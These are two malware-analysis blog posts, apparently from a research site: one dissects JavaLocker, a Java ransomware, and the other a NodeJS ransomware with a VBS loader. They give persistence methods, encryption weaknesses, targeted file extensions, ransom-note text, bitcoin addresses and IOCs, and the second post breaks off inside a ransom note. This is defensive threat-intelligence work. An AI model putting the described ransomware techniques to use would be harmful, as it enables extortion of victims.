<p><br></p>Why would you even bother?! - JavaLocker2020-03-18T00:00:00+01:002020-03-18T00:00:00+01:00f0wLtag:dissectingmalwa.re,2020-03-18:/why-would-you-even-bother-javalocker.html<p>Today we'll take a look at a windows ransomware built with Java. As you might have guessed this will get ugly and is therefore not for the faint of heart.</p><p>Hey there, yeah it has been a while. I've been quite busy with university stuff for the past weeks, so I'm trying to get back into the analysis/blogging thing. I've been looking for interesting/"innovative" samples that differ from the common tricks and techniques. It was unavoidable that I would have to look at a ransomware strain written in the most beautiful programming language there is sooner or later: Java. Let's get it over with.</p>
<p>This strain is without a doubt still in it's testing phase, so it is possible that there will be another version of it with proper encryption routines and other fixes in the next few days.</p>
<p>JavaLocker @ <a href="https://app.any.run/tasks/a14f4d72-1628-481c-9206-1266f75d31ae/">AnyRun</a> | <a href="https://www.virustotal.com/gui/file/9cb578d8517dc1763db9351d3aa9d6958be57ac0b49e3b851f7148eee57ca18b/detection">VirusTotal</a> | <a href="https://www.hybrid-analysis.com/sample/9cb578d8517dc1763db9351d3aa9d6958be57ac0b49e3b851f7148eee57ca18b">HybridAnalysis</a>
--> <code>sha256 9cb578d8517dc1763db9351d3aa9d6958be57ac0b49e3b851f7148eee57ca18b</code></p>
<p>First of all, this is the GUI that the vicitim is presented after a reboot. The Ransomware will encrypt the files on the systems without a delay, but this window isn't shown immediately after, so it's easily missed by Sandboxes like AnyRun that don't reboot for analysis. Apart from the terrible design and english grammar there's nothing more to this screen.</p>
<p><br></p>
<p><center><img alt="GUI" width="750px" height="450px" src="https://dissectingmalwa.re/img/javalocker-gui.png"></center></p>
<p><br></p>
<p>To display the Window with the ransomnote it will copy itself to the Startup Folder.</p>
<p><center><img alt="Start Menu"src="https://dissectingmalwa.re/img/javalocker-autostart.png"></center></p>
<p><br></p>
<p>To decompile the JAR file that I pulled from AnyRun I'm using JD-GUI. To preserve the eyesight of potential readers I later opted to copy the code to a dark-mode capable texteditor.</p>
<p><center><div class="github-card" data-github="java-decompiler/jd-gui" data-width="400" data-height="" data-theme="default"></div>
<script src="//cdn.jsdelivr.net/github-cards/latest/widget.js"></script></center></p>
<p>The Ransomware implements four classes in addition to JavaFX for the GUI: </p>
<p><em>JAVABASIC</em> : Handles the core functions of the Malware.</p>
<p><em>Encryption</em> : Derives a password for the encryption routine and hashes it with MD5.</p>
<p><em>crea</em> : Writes another instance of the ransomware to the disk.</p>
<p><em>key</em> : Holds the encryption and decryption routines.</p>
<p><br></p>
<p><center><img alt="Classes"src="https://dissectingmalwa.re/img/javalocker-classes.png"></center></p>
<p><br></p>
<p>The "scanner" function looks for other attached drives connected to the vicitims PC. One thing to take note of is that the ransomware will only check the drive letters from C through H, so naming and mounting your network drives X:, Y: or Z: might actually save you to some extent.</p>
<p><center><img alt="FS Scanner" src="https://dissectingmalwa.re/img/javalocker-scanner.png"></center></p>
<p><br></p>
<p>A few things that stand out in the next screenshot: The ransomware will spare the C:\Windows path. Secondly the dropped ransomnote will be named <em>"readmeonnotepad.javaencrypt"</em> with the following content: </p>
<p><strong>"Q: What Happen to my computer?\n A:Your personal files are encrypted by javalocker!\nQ How can I recover my Files? A You need to send 300$ of bitcoins to the following adress:BAW4VM2dhxYgXeQepOHKHSQVG6NgaEb94 then contact soviet@12334@gmail.com!"</strong></p>
<p>Another interesting fact is that the wallet address mentioned in the ransomnote is just a random string (another indicator for a test build). The address format doesn't match any of the ones used in mainnet, bchtest or testnet. For the BTC mainnet it would have to start with either 1, 3 or bc1 and it also contains an illegal character ("O"). For further reference I would recommend this guide by <a href="https://allprivatekeys.com/bitcoin-address-format">AllPrivateKeys</a>.</p>
<p>The functions <em>find2</em> and <em>ret</em> are also pretty redundant which indicates lack of knowledge or time spent on it.</p>
<p><br></p>
<p><center><img alt="Redundant Functions" src="https://dissectingmalwa.re/img/javalocker-redundancy.png"></center></p>
<p><br></p>
<p>Let's check which filetypes are affected at the moment. Normally these extension lists are sorted alphabetically, but this one is not. Looks like they cobbled this one together rather than using one of the premade "popular file extensions" lists.</p>
<div class="highlight"><pre><span></span><span class="ss">".accdb"</span><span class="p">,</span> <span class="ss">".pub"</span><span class="p">,</span> <span class="ss">".reg"</span><span class="p">,</span> <span class="ss">".ico"</span><span class="p">,</span> <span class="ss">".mui"</span><span class="p">,</span> <span class="ss">".onetoc2"</span><span class="p">,</span> <span class="ss">".dwg"</span><span class="p">,</span> <span class="ss">".wk1"</span><span class="p">,</span> <span class="ss">".wks"</span><span class="p">,</span> <span class="ss">".vsdx"</span><span class="p">,</span> <span class="ss">".vsd"</span><span class="p">,</span> <span class="ss">".eml"</span><span class="p">,</span> <span class="ss">".msg"</span><span class="p">,</span> <span class="ss">".ost"</span><span class="p">,</span> <span class="ss">".pst"</span><span class="p">,</span> <span class="ss">".pptx"</span><span class="p">,</span> <span class="ss">".jfif"</span><span class="p">,</span> <span class="ss">".doc"</span><span class="p">,</span> <span class="ss">".docx"</span><span class="p">,</span> <span class="ss">".xls"</span><span class="p">,</span> <span class="ss">".xlsx"</span><span class="p">,</span> <span class="ss">".ppt"</span><span class="p">,</span> <span class="ss">".ost"</span><span class="p">,</span> <span class="ss">".msg"</span><span class="p">,</span> <span class="ss">".eml"</span><span class="p">,</span> <span class="ss">".vsd"</span><span class="p">,</span> <span class="ss">".txt"</span><span class="p">,</span> <span class="ss">".csv"</span><span class="p">,</span> <span class="ss">".rtf"</span><span class="p">,</span> <span class="ss">".123"</span><span class="p">,</span> <span class="ss">".wks"</span><span class="p">,</span> <span class="ss">".pdf"</span><span class="p">,</span> <span class="ss">".dwg"</span><span class="p">,</span> <span class="ss">".onetoc2"</span><span class="p">,</span> <span class="ss">".snt"</span><span class="p">,</span> <span class="ss">".snt"</span><span class="p">,</span> <span class="ss">".jpeg"</span><span class="p">,</span> <span class="ss">".jpg"</span><span class="p">,</span> <span class="ss">".docb"</span><span class="p">,</span> <span class="ss">".docm"</span><span class="p">,</span> <span class="ss">".zip"</span><span class="p">,</span> <span class="ss">".7z"</span><span class="p">,</span> <span class="ss">".rar"</span><span class="p">,</span> <span class="ss">".mp4"</span><span class="p">,</span> <span class="ss">".wav"</span><span class="p">,</span> <span class="ss">".mp3"</span><span class="p">,</span> <span class="ss">".cpp"</span><span class="p">,</span> <span class="ss">".gho"</span><span class="p">,</span> <span class="ss">".iso"</span><span class="p">,</span> <span class="ss">".mui"</span><span class="p">,</span> <span class="ss">".flv"</span><span class="p">,</span> <span class="ss">".wma"</span><span class="p">,</span> <span class="ss">".key"</span><span class="p">,</span> <span class="ss">".sln"</span><span class="p">,</span> <span class="ss">".vbs"</span><span class="p">,</span> <span class="ss">".bat"</span><span class="p">,</span> <span class="ss">".cs"</span><span class="p">,</span> <span class="ss">".ini"</span><span class="p">,</span> <span class="ss">".cmd"</span><span class="p">,</span> <span class="ss">".lv"</span><span class="p">,</span> <span class="ss">".c"</span><span class="p">,</span> <span class="ss">".js"</span><span class="p">,</span> <span class="ss">".php"</span><span class="p">,</span> <span class="ss">".mp4"</span><span class="p">,</span> <span class="ss">".html"</span><span class="p">,</span> <span class="ss">".py"</span><span class="p">,</span> <span class="ss">".docb"</span><span class="p">,</span> <span class="ss">".pps"</span><span class="p">,</span> <span class="ss">".gz"</span><span class="p">,</span> <span class="ss">".gpg"</span><span class="p">,</span> <span class="ss">".xlsm"</span><span class="p">,</span> <span class="ss">".vmdk"</span><span class="p">,</span> <span class="ss">".vmx"</span><span class="p">,</span> <span class="ss">".pot"</span><span class="p">,</span> <span class="ss">".pps"</span><span class="p">,</span> <span class="ss">".ppsm"</span><span class="p">,</span> <span class="ss">".ppsx"</span><span class="p">,</span> <span class="ss">".ppam"</span><span class="p">,</span> <span class="ss">".potx"</span><span class="p">,</span> <span class="ss">".potm"</span><span class="p">,</span> <span class="ss">".edb"</span><span class="p">,</span> <span class="ss">".hwp"</span><span class="p">,</span> <span class="ss">".602"</span><span class="p">,</span> <span class="ss">".sxi"</span><span class="p">,</span> <span class="ss">".sti"</span><span class="p">,</span> <span class="ss">".sldx"</span><span class="p">,</span> <span class="ss">".sldm"</span><span class="p">,</span> <span class="ss">".vdi"</span><span class="p">,</span> <span class="ss">".aes"</span><span class="p">,</span> <span class="ss">".arc"</span><span class="p">,</span> <span class="ss">".paq"</span><span class="p">,</span> <span class="ss">".bz2"</span><span class="p">,</span> <span class="ss">".tbk"</span><span class="p">,</span> <span class="ss">".bak"</span><span class="p">,</span> <span class="ss">".tar"</span><span class="p">,</span> <span class="ss">".gz"</span><span class="p">,</span> <span class="ss">".backup"</span><span class="p">,</span> <span class="ss">".vcd"</span><span class="p">,</span> <span class="ss">".bmp"</span><span class="p">,</span> <span class="ss">".png"</span><span class="p">,</span> <span class="ss">".gif"</span><span class="p">,</span> <span class="ss">".raw"</span><span class="p">,</span> <span class="ss">".cgm"</span><span class="p">,</span> <span class="ss">".tif"</span><span class="p">,</span> <span class="ss">".tiff"</span><span class="p">,</span> <span class="ss">".nef"</span><span class="p">,</span> <span class="ss">".psd"</span><span class="p">,</span> <span class="ss">".ai"</span><span class="p">,</span> <span class="ss">".svg"</span><span class="p">,</span> <span class="ss">".djvu"</span><span class="p">,</span> <span class="ss">".m4u"</span><span class="p">,</span> <span class="ss">".m3u"</span><span class="p">,</span> <span class="ss">".mid"</span><span class="p">,</span> <span class="ss">".wma"</span><span class="p">,</span> <span class="ss">".3g2"</span><span class="p">,</span> <span class="ss">".mkv"</span><span class="p">,</span> <span class="ss">".3gp"</span><span class="p">,</span> <span class="ss">".mov"</span><span class="p">,</span> <span class="ss">".avi"</span><span class="p">,</span> <span class="ss">".asf"</span><span class="p">,</span> <span class="ss">".asf"</span><span class="p">,</span> <span class="ss">".mpeg"</span><span class="p">,</span> <span class="ss">".vob"</span><span class="p">,</span> <span class="ss">".mpg"</span><span class="p">,</span> <span class="ss">".wmv"</span><span class="p">,</span> <span class="ss">".fla"</span><span class="p">,</span> <span class="ss">".swf"</span><span class="p">,</span> <span class="ss">".wav"</span><span class="p">,</span> <span class="ss">".sh"</span><span class="p">,</span> <span class="ss">".rb"</span><span class="p">,</span> <span class="ss">".asp"</span><span class="p">,</span> <span class="ss">".php"</span><span class="p">,</span> <span class="ss">".jsp"</span><span class="p">,</span> <span class="ss">".brd"</span><span class="p">,</span> <span class="ss">".sch"</span><span class="p">,</span> <span class="ss">".dch"</span><span class="p">,</span> <span class="ss">".dip"</span><span class="p">,</span> <span class="ss">".dp"</span><span class="p">,</span> <span class="ss">".vb"</span><span class="p">,</span> <span class="ss">".vbs"</span><span class="p">,</span> <span class="ss">".ps1"</span><span class="p">,</span> <span class="ss">".asm"</span><span class="p">,</span> <span class="ss">".h"</span><span class="p">,</span> <span class="ss">".pas"</span><span class="p">,</span> <span class="ss">".suo"</span><span class="p">,</span> <span class="ss">".ldf"</span><span class="p">,</span> <span class="ss">".mdf"</span><span class="p">,</span> <span class="ss">".ibd"</span><span class="p">,</span> <span class="ss">".myi"</span><span class="p">,</span> <span class="ss">".myd"</span><span class="p">,</span> <span class="ss">".frm"</span><span class="p">,</span> <span class="ss">".obd"</span><span class="p">,</span> <span class="ss">".dbf"</span><span class="p">,</span> <span class="ss">".db"</span><span class="p">,</span> <span class="ss">".mdb"</span><span class="p">,</span> <span class="ss">".accdb"</span><span class="p">,</span> <span class="ss">".sql"</span><span class="p">,</span> <span class="ss">".sqlitedb"</span><span class="p">,</span> <span class="ss">".sqlite3"</span><span class="p">,</span> <span class="ss">".asc"</span><span class="p">,</span> <span class="ss">".lay6"</span><span class="p">,</span> <span class="ss">".lay"</span><span class="p">,</span> <span class="ss">".mml"</span><span class="p">,</span> <span class="ss">".sxm"</span><span class="p">,</span> <span class="ss">".otg"</span><span class="p">,</span> <span class="ss">".odg"</span><span class="p">,</span> <span class="ss">".uop"</span><span class="p">,</span> <span class="ss">".std"</span><span class="p">,</span> <span class="ss">".sxd"</span><span class="p">,</span> <span class="ss">".otp"</span><span class="p">,</span> <span class="ss">".odp"</span><span class="p">,</span> <span class="ss">".wb2"</span><span class="p">,</span> <span class="ss">".slk"</span><span class="p">,</span> <span class="ss">".dif"</span><span class="p">,</span> <span class="ss">".stc"</span><span class="p">,</span> <span class="ss">".sxc"</span><span class="p">,</span> <span class="ss">".ots"</span><span class="p">,</span> <span class="ss">".ods"</span><span class="p">,</span> <span class="ss">".3dm"</span><span class="p">,</span> <span class="ss">".max"</span><span class="p">,</span> <span class="ss">".3ds"</span><span class="p">,</span> <span class="ss">".uot"</span><span class="p">,</span> <span class="ss">".stw"</span><span class="p">,</span> <span class="ss">".sxw"</span><span class="p">,</span> <span class="ss">".ott"</span><span class="p">,</span> <span class="ss">".odt"</span><span class="p">,</span> <span class="ss">".pem"</span><span class="p">,</span> <span class="ss">".p12"</span><span class="p">,</span> <span class="ss">".csr"</span><span class="p">,</span> <span class="ss">".crt"</span><span class="p">,</span> <span class="ss">".pfx"</span><span class="p">,</span> <span class="ss">".der"</span>
</pre></div>
<p><br></p>
<p>This build of the ransomware uses DES via javax.crypto.Cipher to encrypt the victim's files. The Seed Value for the DES SecureRandom function is hardcoded and held in variable <em>td</em>.</p>
<p><center><img alt="Encryption / Decryption Routines" src="https://dissectingmalwa.re/img/javalocker-encdec.png"></center></p>
<p><br></p>
<p>Fellow researcher @jishuzhain found that the DES key derived from the td seed is static which should enable victims <em>affected by this exact version</em> to get their files back.</p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr">πSimple analysis of this ransomware. <a href="https://t.co/A9zIAhryi8">pic.twitter.com/A9zIAhryi8</a></p>— onion (@jishuzhain) <a href="https://twitter.com/jishuzhain/status/1236934202429341696?ref_src=twsrc%5Etfw">March 9, 2020</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script> </center></p>
<p><br></p>
<p>And this is where we come to the point of the article headline. Why would someone even bother to: 1. build a Ransomware in JAVA; 2. build it from scratch, because there are, of course, open source ransomware projects on Github like the one below (I selected this one because it can't be directly weaponized, but you probably know my <a href="https://dissectingmalwa.re/earn-quick-btc-with-hiddentearmp4-about-open-source-ransomware.html">stance</a> on OSS ransomware) π.</p>
<p><br></p>
<p><center><div class="github-card" data-github="PanagiotisDrakatos/JavaRansomware" data-width="400" data-height="150" data-theme="default"></div>
<script src="//cdn.jsdelivr.net/github-cards/latest/widget.js"></script></center></p>
<p></br></p>
<h2><strong>MITRE ATT&CK</strong></h2>
<p><em>T1179</em> --> Hooking --> Persistence</p>
<p><em>T1179</em> --> Hooking --> Privilege Escalation</p>
<p><em>T1179</em> --> Hooking --> Credential Access</p>
<p><em>T1114</em> --> Email Collection --> Collection</p>
<p><br></p>
<h2><em>IOCs</em></h2>
<h3>Javalocker</h3>
<div class="highlight"><pre><span></span><span class="n">JAVABASIC</span><span class="p">.</span><span class="n">jar</span> <span class="c1">--> SHA256: 9cb578d8517dc1763db9351d3aa9d6958be57ac0b49e3b851f7148eee57ca18b</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">768</span><span class="p">:</span><span class="o">/</span><span class="n">OJ3GtaE64BWRRJcU99iOZlkp8DOJ3GtaE64BWRRJcU9</span><span class="o">+</span><span class="mi">0</span><span class="n">de</span><span class="p">:</span><span class="o">/</span><span class="n">O4tG4cJb9XnLDO4tG4cJD</span><span class="o">+</span><span class="mi">4</span><span class="n">e</span>
</pre></div>
<h3>Associated Files</h3>
<div class="highlight"><pre><span></span><span class="n">JAVABASIC</span><span class="p">.</span><span class="n">jar</span>
<span class="n">readmeonnotepad</span><span class="p">.</span><span class="n">javaencrypt</span>
<span class="n">DESkey</span><span class="p">.</span><span class="n">dat</span>
</pre></div>The Opposite of Fileless Malware - NodeJS Ransomware2020-01-23T00:00:00+01:002020-01-23T00:00:00+01:00f0wLtag:dissectingmalwa.re,2020-01-23:/the-opposite-of-fileless-malware-nodejs-ransomware.html<p>This one is a few days old already but still worth a look. Have I mentioned that I hate Javascript?</p><p><center><img alt="Logo" width="700px" height="400px" src="https://dissectingmalwa.re/img/node-logo.png"></center></p>
<p></br></p>
<p>This is not the first time that someone built a Ransomware Strain with NodeJS (check out this article about <a href="https://www.bleepingcomputer.com/news/security/the-new-raa-ransomware-is-created-entirely-using-javascript/">Ransom32</a> and let's not forget about <a href="https://www.bleepingcomputer.com/news/security/microsoft-spots-nodersok-malware-campaign-that-zombifies-pcs/">Nodersok</a>), but it's not an everyday sight either. This Malware Sample was first discovered by Xavier Mertens in a post to the SANS ISC Forum <a href="https://isc.sans.edu/forums/diary/Ransomware+in+Nodejs/25664/">here</a>.</p>
<h4><em>A general disclaimer as always: downloading and running the samples linked below will lead to the encryption of your personal data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<p>NodeJS Ransom @ <a href="https://app.any.run/tasks/f262f1ff-e0a2-44c2-8b6f-414b42343af4/">AnyRun</a> | <a href="https://www.virustotal.com/gui/file/90acae3f682f01864e49c756bc9d46f153fcc4a7e703fd1723a8aa7ec01b378c/detection">VirusTotal</a> | <a href="https://www.hybrid-analysis.com/sample/5e3dfe020da258c17699ee7b6ca48926d04a3c26b4643d036d27363299dc3987?environmentId=100">HybridAnalysis</a>
--> <code>sha256 9b6681103545432cd1373492297a6a12528f327d14a7416c2b71cfdcbdafc90b</code></p>
<p><br/></p>
<p>The VBS "Loader" is 46KiB big and contains 2417 empty lines before any Code (which is not obfuscated at all). </p>
<p>As one of the first steps the Malware will download a distributable of NodeJS Version 8.x (which is quite old). It is also assuming the User Agent of Firefox 52.</p>
<p><center><img alt="Downloading NodeJS" src="https://dissectingmalwa.re/img/node-downl.png"></center></p>
<p><br/></p>
<p>It will add the following registry keys to gain persistence on the System. The first one will run the vbs script (to prevent additional encryption it checks for <em>AppData\Local\GFp0JAk\initdone</em> which will be created once the vbs script ran fully once), the second reg key will show the CLI Version of the Ransomnote prompting for the decryption key and the last one will open the HTML Ransomnote.</p>
<p><center><img alt="Registry Keys" src="https://dissectingmalwa.re/img/node-reg.png"></center></p>
<p><br/></p>
<p>Because the Javascript has to interact with the system components somehow the criminals shipped a version of the <a href="https://www.npmjs.com/package/graceful-fs">graceful-fs</a> npm package which is not downloaded from the Internet but rather shipped in the Script itself and written to the respective files.</p>
<p>The Javascript Portion requires the following dependencies: <code>graceful-fs, crypto, path, child_process, readline, os</code></p>
<p><center><img alt="Writing Dependencies" src="https://dissectingmalwa.re/img/node-grace.png"></center></p>
<p></br></p>
<p>Up next it will engage a loop to kill Microsoft Word, Excel, Outlook and Autocad. (Targeting business PCs / Workstations, no SQL or other Serives tho, so it's like not meant to infect servers)</p>
<p><center><img alt="Killing processes" src="https://dissectingmalwa.re/img/node-kill.png"></center></p>
<p><br/></p>
<p>Looks like they implemented a custom password generator for testing purposes, so let's take a quick look to see how terrible it is. The Length of the password is defined globally at the top of the VB script as <em>13 characters</em>. The yellow section will set the boundaries for ASCII lower and upper case characters plus numbers. The variables called pCheckxxx are initialized with 0 and will be used in the green section later.</p>
<p>The author is using the <strong>Randomize()</strong> function (without a defined <em>number</em>, so it is seeding off the System timer) which is a horrible way of generating "pseudo random numbers". Btw. Rnd will return a number less than one but but greater or equal to 0. If you would like to know more about Rnd()s and Randomize()s flaws you should definitely check out this article: <a href="https://www.experts-exchange.com/articles/11114/An-Examination-of-Visual-Basic%27s-Random-Number-Generation.html">Link</a>. Moving on to the Red Section we can see how they choose their characters for Lowercase, Uppercase and the Numbers. Funnily enough they defined an ASCII range for special characters as well but don't actually end up using it at all (which means less entropy yay) π€</p>
<p>Lastly the Green Section will check for atleast one Upper- Lowercase and Number in the password, otherwise it will discard it and start over. </p>
<p><center><img alt="Password Generation Routine" src="https://dissectingmalwa.re/img/node-pwgen.png"></center></p>
<p><br/></p>
<p>As I already mentioned this password generator was only used for testing purposes since the function call in the VB script has been commented out. This would have been a fun little exercise to bruteforce :D Never use Rnd() for crypto operations kids!</p>
<h3><strong>Work in Progress</strong></h3>
<p></br></p>
<p>The Public Key Blob is embedded into the Javascript code as well:</p>
<div class="highlight"><pre><span></span><span class="o">-----</span><span class="nv">BEGIN</span> <span class="nv">PUBLIC</span> <span class="nv">KEY</span><span class="o">-----</span>
<span class="nv">MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA403SyYJw3sUvumo0Gsjy</span>\<span class="nv">nFoPgFtOEJ4ZxIhsw9MX3E</span><span class="o">/</span>
<span class="nv">PpM3OxQqQitQtAfaKSTYT39s9kprxuFtW6ZXB</span><span class="o">/</span><span class="nv">lNUp</span>\<span class="nv">nMm9IZfbYyELUMyi</span><span class="o">+</span><span class="nv">zHKkIi8PKEGdASogYD84VDkVPkVh</span>
<span class="nv">aXB2YvNeyJ7Rhup2SubG</span>\<span class="nv">nO7MYtOYM57TOOHT</span><span class="o">/</span><span class="nv">DDCX5Q3AEXPSMvSMgPgZ6hSKuVAgOhztcvgxMH3sYNQbNwL</span>\<span class="nv">nj</span>
<span class="nv">LD1MCk6eoVDqTRvarE9IoLjdBuGhbWJQ7afWkAAEv0vriPI22F5MAhhZLhuKjCg</span>\<span class="nv">nTNELFzvWQEKWsZMyZS70V5w</span>
<span class="nv">CGqCuocrmGFPBeS4ZdHS3W94jA18a36m8V76tnlbz</span>\<span class="nv">n</span><span class="o">/</span><span class="nv">gnWdtY81jBPdnHiXp22tIswtrpN</span><span class="o">+</span><span class="mi">5</span><span class="nv">UNn7A1WHhBkfdPp</span>
<span class="nv">iyHRzTmnYmLHKHPyYkR</span>\<span class="nv">nGJj74fUiAuvwlCmmE3rfwH9uBuL3v</span><span class="o">+</span><span class="nv">plMCbRs3Log09Q4GyTYd2Z2OacWTE4gRCf</span>\<span class="nv">n2</span>
<span class="mi">3</span><span class="nv">wCYkyeZrfXhnFmH0TGsQak0lznZBkudJOL7Ms1NUIWa1zd</span><span class="o">/</span><span class="nv">gqUGROR1Mb</span><span class="o">/</span><span class="nv">BYVt</span>\<span class="nv">nzmBo4VMak6RCwvuXhPmR</span><span class="o">+</span><span class="nv">br</span>
<span class="nv">gb6ul</span><span class="o">+</span><span class="mi">74</span><span class="nv">F0fHEsyBQoeurj9EqAVxmD4jMnzwQi1HB</span>\<span class="nv">nEqOGcc2mAQvtVtgU17MQqVS3JFiYZTNn1SWuTUJCAF</span><span class="o">+</span><span class="nv">xz</span>
<span class="nv">NgVsjQuQVJZCXa2c4NL</span>\<span class="nv">nK1iOlUsoOxkYTStUIdX1miUCAwEAAQ</span><span class="o">==</span>
<span class="o">-----</span><span class="k">END</span> <span class="nv">PUBLIC</span> <span class="nv">KEY</span><span class="o">-----</span>
</pre></div>
<p><br/></p>
<p>Actually the Ransomware drops two notes: The HTML File and a one similarly phrased version of it in a console window:</p>
<p><center><img alt="CLI Ransomnote" src="https://dissectingmalwa.re/img/node-cli.png"></center></p>
<p><br/></p>
<h2><strong>MITRE ATT&CK</strong></h2>
<p><em>T1035</em> --> Service Execution --> Execution</p>
<p><em>T1215</em> --> Kernel Modules and Extensions --> Persistence</p>
<p><em>T1179</em> --> Hooking --> Persistence</p>
<p><em>T1060</em> --> Registry Run Keys / Start Folder --> Persistence</p>
<p><em>T1055</em> --> Process Injection --> Privilege Escalation</p>
<p><em>T1179</em> --> Hooking --> Privilege Escalation</p>
<p><em>T1055</em> --> Process Injection --> Defense Evasion</p>
<p><em>T1112</em> --> Modify Registry -->Defense Evasion</p>
<p><em>T1107</em> --> File Deletion --> Defense Evasion</p>
<p><em>T1179</em> --> Hooking --> Credential Access</p>
<p><em>T1012</em> --> Query Registry --> Discovery</p>
<p><em>T1120</em> --> Peripheral Device Discovery --> Discovery</p>
<p><em>T1057</em> --> Process Discovery --> Discovery</p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>NodeJS Ransom</h3>
<div class="highlight"><pre><span></span><span class="n">GFp0JAk</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: 3a97828f05008741097242c3e23612010c72f7b987037c30050cd283cd7cbcfb</span>
<span class="mi">4</span><span class="n">cdfb03db53a05603f6a096cf477dfdc</span><span class="p">.</span><span class="n">vbs</span> <span class="c1">--> SHA256: 90acae3f682f01864e49c756bc9d46f153fcc4a7e703fd1723a8aa7ec01b378c</span>
<span class="n">lLT8PCI</span><span class="p">.</span><span class="n">js</span> <span class="c1">--> SHA256: 53a95c9126be8262afb0821da4d7137e6c8a4d9b363f91298249ca134d394bf4</span>
<span class="n">GFp0JAk</span><span class="err">\</span><span class="n">node_modules</span><span class="err">\</span><span class="n">graceful</span><span class="o">-</span><span class="n">fs</span><span class="err">\</span><span class="n">fs</span><span class="p">.</span><span class="n">js</span> <span class="c1">--> SHA256: a54b9999ae69328c2ac676e255d0f7767f2083c5c95e1db98d15ae44e3d68896</span>
<span class="n">GFp0JAk</span><span class="err">\</span><span class="n">node_modules</span><span class="err">\</span><span class="n">graceful</span><span class="o">-</span><span class="n">fs</span><span class="err">\</span><span class="n">package</span><span class="p">.</span><span class="n">json</span> <span class="c1">--> SHA256: 9bd1f57b72c1dede710f6f12ee3f713461d7667776d734b043884e18705505e4</span>
<span class="n">GFp0JAk</span><span class="err">\</span><span class="n">node_modules</span><span class="err">\</span><span class="n">graceful</span><span class="o">-</span><span class="n">fs</span><span class="err">\</span><span class="n">graceful</span><span class="o">-</span><span class="n">fs</span><span class="p">.</span><span class="n">js</span> <span class="c1">--> SHA256: d4f59f5bea29583031919657f6a4a29554962cf48b61a6c4a5a22f37f4d3963e</span>
<span class="n">GFp0JAk</span><span class="err">\</span><span class="n">node_modules</span><span class="err">\</span><span class="n">graceful</span><span class="o">-</span><span class="n">fs</span><span class="err">\</span><span class="n">legacy</span><span class="o">-</span><span class="n">streams</span><span class="p">.</span><span class="n">js</span> <span class="c1">--> SHA256: 5727b9a8597dc68011961504513ca8ce7caaf6df2431b2861d4f9d7af5f9465c</span>
<span class="n">GFp0JAk</span><span class="err">\</span><span class="n">node_modules</span><span class="err">\</span><span class="n">graceful</span><span class="o">-</span><span class="n">fs</span><span class="err">\</span><span class="n">polyfills</span><span class="p">.</span><span class="n">js</span> <span class="c1">--> SHA256: 36b3c0109afc06172fe3a7a521700b0eb13ab58d221081c5411920b4657b5841</span>
</pre></div>
<h3>E-Mail Addresses / Contact</h3>
<div class="highlight"><pre><span></span><span class="n">n</span><span class="o">/</span><span class="n">a</span>
</pre></div>
<h3>Bitcoin Address</h3>
<div class="highlight"><pre><span></span><span class="mi">18</span><span class="n">aBKwKJvMCkZmpkcCbW9b9y9snAmU3kgo</span>
</pre></div>
<h3>Ransomnote</h3>
<div class="highlight"><pre><span></span><span class="nv">Your</span> <span class="nv">files</span> <span class="nv">are</span> <span class="nv">encrypted</span><span class="o">!</span> <span class="nv">Encryption</span> <span class="nv">was</span> <span class="nv">produced</span> <span class="nv">using</span> <span class="nv">a</span> <span class="nv">unique</span> <span class="nv">public</span> <span class="nv">key</span> <span class="nv">RSA</span><span class="o">-</span><span class="mi">2048</span> <span class="nv">generated</span> <span class="k">for</span> <span class="nv">this</span> <span class="nv">computer</span>. <span class="nv">To</span>
<span class="nv">decrypt</span> <span class="nv">files</span> <span class="nv">you</span> <span class="nv">need</span> <span class="nv">to</span> <span class="nv">obtain</span> <span class="nv">the</span> <span class="nv">private</span> <span class="nv">key</span>.<span class="nv">The</span> <span class="nv">single</span> <span class="nv">copy</span> <span class="nv">of</span> <span class="nv">the</span> <span class="nv">private</span> <span class="nv">key</span>, <span class="nv">which</span> <span class="nv">will</span> <span class="nv">allow</span> <span class="nv">to</span> <span class="nv">decrypt</span> <span class="nv">files</span>,
<span class="nv">located</span> <span class="nv">on</span> <span class="nv">a</span> <span class="nv">remote</span> <span class="nv">server</span> <span class="nv">on</span> <span class="nv">the</span> <span class="nv">Internet</span>.<span class="nv">The</span> <span class="nv">server</span> <span class="nv">will</span> <span class="nv">destroy</span> <span class="nv">the</span> <span class="nv">key</span> <span class="nv">after</span> <span class="nv">a</span> <span class="s1">'</span><span class="s"> + tillDate + </span><span class="s1">'</span>. <span class="nv">After</span> <span class="nv">that</span>, <span class="nv">nobody</span>
<span class="nv">will</span> <span class="nv">be</span> <span class="nv">able</span> <span class="nv">to</span> <span class="nv">restore</span> <span class="nv">files</span> ...<span class="nv">To</span> <span class="nv">obtain</span> <span class="nv">the</span> <span class="nv">private</span> <span class="nv">key</span> <span class="k">for</span> <span class="nv">this</span> <span class="nv">computer</span>, <span class="nv">you</span> <span class="nv">need</span> <span class="nv">to</span> <span class="k">send</span>
<span class="mi">0</span>.<span class="mi">4</span> <span class="nv">BTC</span>
<span class="nv">to</span> <span class="nv">bitcoin</span> <span class="nv">address</span>
<span class="mi">18</span><span class="nv">aBKwKJvMCkZmpkcCbW9b9y9snAmU3kgo</span>
<span class="nv">You</span> <span class="nv">can</span> <span class="nv">easily</span> <span class="nv">delete</span> <span class="nv">this</span> <span class="nv">software</span>, <span class="nv">but</span> <span class="nv">know</span> <span class="nv">that</span> <span class="nv">without</span> <span class="nv">it</span>, <span class="nv">you</span> <span class="nv">will</span> <span class="nv">never</span> <span class="nv">be</span> <span class="nv">able</span> <span class="nv">to</span> <span class="nv">get</span> <span class="nv">your</span> <span class="nv">original</span> <span class="nv">files</span> <span class="nv">back</span>.
<span class="nv">Disable</span> <span class="nv">your</span> <span class="nv">antivirus</span> <span class="nv">to</span> <span class="nv">prevent</span> <span class="nv">the</span> <span class="nv">removal</span> <span class="nv">of</span> <span class="nv">this</span> <span class="nv">software</span>.<span class="nv">When</span> <span class="nv">your</span> <span class="nv">transaction</span> <span class="nv">will</span> <span class="nv">be</span> <span class="nv">verified</span> <span class="nv">and</span> <span class="nv">confirmed</span> <span class="nv">you</span>
